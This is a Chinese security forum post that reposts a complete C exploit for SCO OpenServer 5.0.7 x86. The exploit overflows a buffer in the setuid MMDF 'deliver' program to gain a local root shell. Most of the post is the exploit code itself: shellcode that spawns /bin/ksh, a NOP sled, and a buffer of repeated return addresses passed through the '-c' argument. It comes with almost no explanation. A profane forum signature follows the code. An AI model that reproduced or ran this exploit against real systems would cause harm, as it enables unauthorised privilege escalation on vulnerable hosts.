‹‹ 上一主题 | 下一主题 ››
发新话题
打印

MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86

EvilOctal

团队执行官

Rank: 8Rank: 8

E.S.T社区执行帐号

帖子
9821 
精华
768 
积分
40330 
阅读权限
200 
性别
男 
在线时间
3973 小时 
注册时间
2004-7-4 
最后登录
2008-8-29 
楼主 发表于 2004-10-28 11:51  只看该作者

MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86

信息来源:安全焦点
复制内容到剪贴板
代码:
/*
*  MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86
*  Copyright 2004 Ramon de Carvalho Valle
*
*/

char shellcode[]=        /*  36 bytes                  */
   "\x68\xff\xf8\xff\x3c"  /*  pushl  $0x3cfff8ff          */
   "\x6a\x65"          /*  pushl  $0x65              */
   "\x89\xe6"          /*  movl   %esp,%esi            */
   "\xf7\x56\x04"       /*  notl   0x04(%esi)           */
   "\xf6\x16"          /*  notb   (%esi)              */
   "\x31\xc0"          /*  xorl   %eax,%eax            */
   "\x50"            /*  pushl  %eax               */
   "\x68""/ksh"        /*  pushl  $0x68736b2f          */
   "\x68""/bin"        /*  pushl  $0x6e69622f          */
   "\x89\xe3"          /*  movl   %esp,%ebx            */
   "\x50"            /*  pushl  %eax               */
   "\x50"            /*  pushl  %eax               */
   "\x53"            /*  pushl  %ebx               */
   "\xb0\x3b"          /*  movb   $0x3b,%al            */
   "\xff\xd6"          /*  call   *%esi              */
;

main(int argc,char **argv) {
   char buffer[16384],address[4],*p;
   int i;

   printf("MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86\n");
   printf("Copyright 2004 Ramon de Carvalho Valle\n\n");

   *((unsigned long *)address)=(unsigned long)buffer-256+5120+4097;

   sprintf(buffer,"-c");
   p=buffer+2;
   for(i=0;i<5120;i++) *p++=address[i%4];
   for(i=0;i<8192;i++) *p++=0x90;
   for(i=0;i<strlen(shellcode);i++) *p++=shellcode[i];
   *p=0;

   execl("/usr/mmdf/bin/deliver","deliver",buffer,0);
}
曾几何时,有人对我说:装B遭雷劈。我说:去你妈的。于是,这个人又对我说:如果再说脏话,上帝会惩罚你的。我说:我操上帝。结论:彪悍的人生不需要上帝。

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题